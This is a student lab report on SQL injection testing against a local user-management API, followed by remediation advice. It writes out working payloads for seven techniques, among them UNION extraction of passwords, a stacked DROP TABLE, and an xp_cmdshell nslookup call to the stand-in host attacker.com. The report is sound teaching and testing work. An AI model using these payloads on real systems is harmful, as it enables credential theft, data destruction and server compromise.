AAiT

Software Engineering Software security

SQL Injection Lab

PREPARED BY :

1, Biruk Worku ID : UGR/8359/13

2, Birhan Aschalew ID : UGR/9050/13

3, Natnael Dejene ID : UGR/4254/13

4, Rahel Solomon ID : UGR/9946/13

5, Yeabsra Aemro ID : UGR/5733/12

Submitted to: Dr.

Seleshi Submission
Date: Nov 30, 2024
SQL Injection Vulnerability Report

Overview
This report highlights vulnerabilities identified in a user management application due to
improper handling of SQL queries. The vulnerabilities include Classic SQL Injection
(Tautology-Based) and Union-Based SQL Injection, both of which exploit unsafe query
construction and enable attackers to manipulate or retrieve unauthorized data from the
database.

1. Classic SQL Injection (Tautology-Based)

Description:
This type of attack manipulates the SQL query by injecting a tautology, such as '1'='1'.
The tautology always evaluates to true, enabling attackers to bypass filtering conditions
and retrieve unauthorized data.
Test Case 1: Tautology-based SQL Injection in getUsersByNameUnsafe
Method: GET
URL: http://localhost:8089/api/users?name=' OR '1'='1
Expected SQL Query:
SELECT u FROM User u WHERE u.name = '' OR '1'='1'
Test Result:
Observed Behavior: The query returns all users from the database. Since the tautology
'1'='1' is always true, the filtering condition is bypassed.
Impact: An attacker can retrieve all user records without authorization, which may
expose sensitive user information.
Risk Level: High
2. Union-based SQL Injection

Description:
Union-based SQL injection combines the results of two or more queries. An attacker can
leverage this technique to retrieve sensitive data from unrelated database tables by
merging it with the results of a legitimate query.

Test Case 2: Union-based SQL Injection in getUsersByNameUnsafe

Method: GET
URL: http://localhost:8089/api/users?name=' UNION SELECT null, username, password
FROM user--
Expected SQL Query:
SELECT * FROM user WHERE name = '' UNION SELECT null, username, password
FROM user--
Test Result:
Test Result:

Observed Behavior:
The query attempts to merge data from the users table with data from another table
containing sensitive fields (username and password).
If the database structure and permissions allow it, this query may expose sensitive
information such as usernames and passwords.
Impact:
Potential data breach exposing credentials and other sensitive user information.
Could allow attackers to gain unauthorized access to the system.
Risk Level: Critical

3. Error-Based SQL Injection

Description:
Error-based SQL injection relies on forcing the database to generate an error message that
leaks sensitive information about the database schema or query logic.

Test Case 3: Error-Based SQL Injection in getUsersByNameUnsafe

Method: GET

URL:

http://localhost:8089/api/users?name=' OR 1=CONVERT(int, (SELECT @@version))--

Expected SQL Query:
SELECT u FROM User u WHERE u.name = '' OR 1=CONVERT(int, (SELECT
@@version))--
Test Result:
Observed Behavior:
The query forces an error by attempting an invalid data type conversion or using an
incorrect function. The error message returned by the database reveals the database
version or other sensitive information.
Impact: Leaks critical details about the database (e.g., version, vendor, schema), which
attackers can use for further exploits.
Risk Level: High

4. Boolean-Based SQL Injection

Description:
This technique relies on sending boolean conditions to observe differences in application
behavior (e.g., true vs. false).

Test Case 4: Boolean-Based SQL Injection in getUsersByNameUnsafe

Method: GET

URL:

http://localhost:8089/api/users?name=' AND 1=1--

http://localhost:8089/api/users?name=' AND 1=2--
Expected SQL Queries:

SELECT u FROM User u WHERE u.name = '' AND 1=1--

SELECT u FROM User u WHERE u.name = '' AND 1=2--
Test Result:

Observed Behavior:
For 1=1, the query executes successfully and returns results.
For 1=2, the query executes but returns no results.
Impact: This allows attackers to infer application logic and determine whether an
injection attempt is succeeding or failing.
Risk Level: Medium
5. Time-Based Blind SQL Injection
Description:
This technique sends queries that force the database to pause for a certain period,
allowing attackers to infer vulnerabilities based on response delays.

Test Case 5: Time-Based Blind SQL Injection in getUsersByNameUnsafe

Method: GET

URL:

http://localhost:8089/api/users?name='; IF(1=1) WAITFOR DELAY '00:00:05'--

Expected SQL Query:

SELECT u FROM User u WHERE u.name = ''; IF(1=1) WAITFOR DELAY '00:00:05'--
Test Result:
Observed Behavior:
The query causes the database to pause for 5 seconds before responding. If this delay
occurs, the application is vulnerable to time-based blind SQL injection.
Impact: Attackers can use this to extract sensitive data through a series of logical tests
and time delays.
Risk Level: High

6. Stacked Queries SQL Injection

Description:
Stacked queries allow attackers to execute multiple queries in a single request by
terminating the first query and appending malicious queries.

Test Case 6: Stacked Queries in createUserUnsafe

Method: POST

URL:

http://localhost:8089/api/users
Body:

{
 "name": "'; DROP TABLE users;--",
"email": "[email protected]"
}
Expected SQL Query:

INSERT INTO users (name, email) VALUES ('; DROP TABLE users;--',
'[email protected]')
Test Result:

Observed Behavior:
If the application is vulnerable, the injected query drops the users table, resulting in
irreversible data loss.
If the database rejects stacked queries, an error will occur, but the vulnerability still
exists.
Impact: Attackers can execute multiple malicious queries, such as deleting tables, altering
schema, or creating unauthorized users.
Risk Level: Critical

7. Out-of-Band SQL Injection

Description:
Out-of-band SQL injection uses additional communication channels (e.g., DNS or HTTP)
to extract data. This requires the attacker to have control over the external service used
for data extraction.

Test Case 7: Out-of-Band SQL Injection in getUsersByNameUnsafe

Method: GET

URL:

http://localhost:8089/api/users?name='; EXEC xp_cmdshell('nslookup attacker.com')--

Expected SQL Query:

SELECT u FROM User u WHERE u.name = ''; EXEC xp_cmdshell('nslookup

attacker.com')--
Test Result:

Observed Behavior:
The query executes a system command (nslookup) that attempts to resolve attacker.com,
sending data to the attacker's server.
If the database allows system commands, this can be exploited to extract sensitive data or
compromise the server.
Impact: Attackers can extract data without directly viewing responses in the application,
making detection harder.
Risk Level: Critical

General Recommendations
1. Use Parameterized Queries or ORM Frameworks:
Avoid direct string concatenation in SQL queries. Use prepared statements or ORM
frameworks like JPA or Hibernate, which automatically handle input sanitization.
Example:
@Query("SELECT u FROM User u WHERE u.name = :name")
List<User> findUsersByName(@Param("name") String name);
2. Input Validation and Sanitization:
Validate and sanitize all user inputs before processing. Reject inputs containing SQL
keywords, special characters, or patterns likely to be malicious.
3. Least Privilege Principle:
Limit the database user’s permissions. For example, the database user should not have
permissions to execute DROP TABLE or access unrelated tables.
4. Error Handling:
Avoid exposing detailed error messages to the user. Use a generic error message and log
the details for internal debugging.
5. Use Web Application Firewalls (WAF):
Employ a WAF to monitor and block malicious requests targeting SQL injection
vulnerabilities.
Conclusion
The vulnerabilities identified in this application are severe and can lead to unauthorized
data access, credential leaks, and potentially complete database compromise. Immediate
steps should be taken to remediate these vulnerabilities by implementing secure coding
practices, validating user inputs, and employing parameterized queries.